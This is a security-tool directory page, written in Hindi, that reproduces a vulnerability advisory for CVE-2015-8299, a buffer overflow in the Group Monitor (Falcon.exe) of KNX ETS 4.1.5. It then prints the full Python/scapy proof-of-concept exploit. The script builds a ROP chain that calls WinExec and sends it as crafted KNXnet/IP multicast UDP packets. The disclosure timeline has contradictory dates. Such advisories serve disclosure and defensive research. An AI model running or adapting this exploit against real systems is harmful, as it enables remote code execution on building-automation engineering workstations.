Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2015-8299 — CVE-2015-8299 एडवाइजरी और PoC | Kitploit
उपकरण/GitHubGitHub/kernoelpanic/cve-2015-8299
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHubkernoelpanic/cve-2015-8299

CVE-2015-8299

CVE-2015-8299 एडवाइजरी और PoC

रिपॉजिटरी देखें
10 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

knAx_20150101

शीर्षक:

KNX प्रबंधन सॉफ्टवेयर ETS में दूरस्थ कोड निष्पादन भेद्यता

श्रेणी/सारांश:

बफर अतिप्रवाह भेद्यता

उत्पाद:

ETS (इंजीनियरिंग टूल सॉफ्टवेयर)

प्रभावित संस्करण:

  • ETS 4.1.5 (Build 3246)

कोई अन्य संस्करण परीक्षित नहीं

सुधारित संस्करण:

अज्ञात

विक्रेता:

KNX एसोसिएशन

प्रभाव:

गंभीर

CVE संख्या:

CVE-2015-8299

समयरेखा

  • 2013-10-11 भेद्यता की पहचान
  • 2013-10-?? पहला विक्रेता संपर्क, मुद्दे पर विक्रेता की कोई प्रतिक्रिया नहीं
  • 2013-07-30 दूसरा विक्रेता संपर्क, मुद्दे पर विक्रेता की कोई प्रतिक्रिया नहीं
  • 2013-10-06 तीसरा विक्रेता संपर्क, मुद्दे पर विक्रेता की कोई प्रतिक्रिया नहीं
  • 2015-07-14 cve-request@mitre से संपर्क किया।
  • 2015-11-23 प्रकट

क्रेडिट:

Aljosha Judmayer [email protected] (SBA Research)

संदर्भ:

  • ETS पर जानकारी: http://www.knx.org/de/knx-tools/ets4/einfuehrung/
  • KNX एसोसिएशन: http://www.knx.org/

विवरण:

भेद्यता एक memcpy ऑपरेशन में बफर अतिप्रवाह के कारण होती है, जब समूह संदेश मॉनिटर (उर्फ फाल्कन) में विशेष रूप से तैयार किए गए KNXnet/IP पैकेटों को पार्स किया जाता है। एक संबंधित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसे Windows XP SP3 पर स्थापित एक प्रभावित ETS संस्करण पर परीक्षण किया गया था, नीचे पाया जा सकता है। प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट UDP पैकेट उत्पन्न करता है जो भेद्यता को ट्रिगर करता है और कम से कम एप्लिकेशन को क्रैश कर देता है (इसे चलाने के लिए python और scapy की आवश्यकता है)।

प्रूफ-ऑफ-कॉन्सेप्ट:

चूंकि यह केवल एक PoC है, ROP श्रृंखला को सावधानीपूर्वक नहीं चुना गया था और आपके सिस्टम पर वांछित परिणामों को पुन: उत्पन्न करने के लिए अनुकूलन की आवश्यकता हो सकती है।

knAx.py:

root@kitploit:~
#!/usr/bin/env python
"""  ETS4 buffer overflow exploit PoC

This is a Proof-of-Concept (PoC) remote exploit of a ETS4 which is
currently running the monitoring software for group messages aka.
"Groupenmonitor". This feature of the ETS4 runs an executable called
"Falcon.exe" which is vulnerable to a buffer overflow. 

The vulnerable function gets called at:
0043C994 call    overflow_43C743
This function, which is responsible for the overflow, is located at 0x43c743. 
The "memcpy" which produces the overflow gets called at:
0043C931 call    memcpy 

Vulnerable version:
    ETS 4.1.5 (Build 3246)
    Stammdaten: Version 57, Schema 1.1
    registry key: "NET Framework Setup"
        v2.0.50727 -version 2.2.30729
        v4 -version 4.0.30319

ETS4.exe
    LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium
    Assembly Version: 4.1.3246.36180
    InternalName: ETS4.exe
    FileVersion: 4.1.3246.36180
    CompanyName: KNX Association cvba
    Comments: ETS4 Application
    ProductName: ETS4
    ProductVersion: 4.1.3246.36180
    FileDescription: ETS4
    OriginalFilename: ETS4.exe

Falcon.exe
    LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium
    InternalName: Falcon
    FileVersion: 2.0.5184.4346
    CompanyName: KNX Association
    SpecialBuild: 2011.01.16
    LegalTrademarks: KNX Association
    OLESelfRegister: 
    ProductVersion: 2.0
    FileDescription: Falcon
    OriginalFilename: Falcon.ex

Tested on:
    Windows XP SP3 32bit

This exploit uses return-oriented-programming techniques. The gadgets used for ROP are:
ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | "
ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | "
ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | "
user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | "

The exploit requires root privelages to send the crafted packet and 
the scapy python module!

PoC and vuln. discovery
by aljosha judmayer 
"""
from struct import pack,unpack
from scapy.all import *

# --- variables ---
ip_dest = "224.0.23.12"
udp_dport = 3671
udp_sport = 3671
sys_iface = "vboxnet0" # <= CHANGE ME! to external network interface 
# ---
knxhdr="\x06\x10\x05\x30\x01\xb2"
knxmsg="\xac\x01\x81\xa9\xe3\xac\xcb\x44\xff\xa2\x67\xcd\x03\x6f\x05\xe4\x58\x19\xae\x65\x1b\x14\x38\x4d\x83\x60\x06"
padding="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

def test():
    """ this should terminate the Falcon.exe process """
    exit="\xfa\xca\x81\x7c" # ExitProcess 0x7c81cafa, or 0xffffffff for seg fault

    sendpayload(knxhdr + knxmsg + padding + exit)
    return

def exploit():
    """ 
    This constructs a ROP payload and sends it. 
    Because of stack manipulation after the overflow we need to jump
    over some bytes. Therefore the esp is increased. 
    """

    eip  = pack("<L",0x774fdb5b)    # xor eax,eax    ;zero out register
    eip += pack("<L",0x77550f6f)    # add eax,64h    ;add jump distance
    eip += pack("<L",0x774ff447)    # add eax,esp    ;add the current position of esp
    eip += pack("<L",0x7e467666)    # xchg esp,eax   ;load the new esp address 
    # --- padding ret-sled as NOP-sled
    eip += pack("<L",0x77550f72)*28 # ret            ;use ret as nop
    # --- str chunk 1
    eip += pack("<L",0x7752f82a)    # pop ecx        ;load string 
    eip += "calc"                   # "calc"         ;string  
    eip += pack("<L",0x774faf34)    # pop eax        ;load dst. address
    eip += pack("<L",0x7ffdf8f4)    # f4f8fd7f       ;dst address
    eip += pack("<L",0x77593502)    # mov [eax], ecx ;copy ecx to [eax]
    # --- str chunk 2
    eip += pack("<L",0x7752f82a)    # pop ecx        ;load string 
    eip += ".exe"                   # ".exe"         ;string  
    eip += pack("<L",0x774faf34)    # pop eax        ;load dst. address
    eip += pack("<L",0x7ffdf8f4+4)  # f4f8fd7f +4  ;dst address + 4
    eip += pack("<L",0x77593502)    # mov [eax], ecx ;copy str. to dst.

    # --- call WinExec()
    eip += pack("<L",0x7c8623ad)    # address of WinExec()
    eip += pack("<L",0x7c81cafa)    # ret after WinExec(), into ExitProcess 0x7c81cafa
    eip += pack("<L",0x7ffdf8f4)    # address of string

    #DEBUG
    #ostr = "\\x".join("{:02x}".format(ord(c)) for c in eip)
    #print "\\x%s" %ostr

    sendpayload(knxhdr + knxmsg + padding + eip)
    return


def sendpayload(payload):
    """ send scapy udp payload """
    pkt=Ether(dst="01:00:5e:00:17:0c")/IP(dst=ip_dest)/UDP(dport=udp_dport,sport=udp_sport)/payload
    #pkt.show2() #DEBUG
    hexdump(pkt)

    sendp(pkt, iface=sys_iface)

    return

def sendpkt(pkt):
    """ send scapy pkt on layer 2, no auto stuff """
    #pkt.show2() #DEBUG
    hexdump(pkt)

    sendp(pkt, iface=sys_iface)

    return

def main():
    exploit()
    return 0

if __name__ == "__main__":
    sys.exit(main())
टूल डाउनलोड करें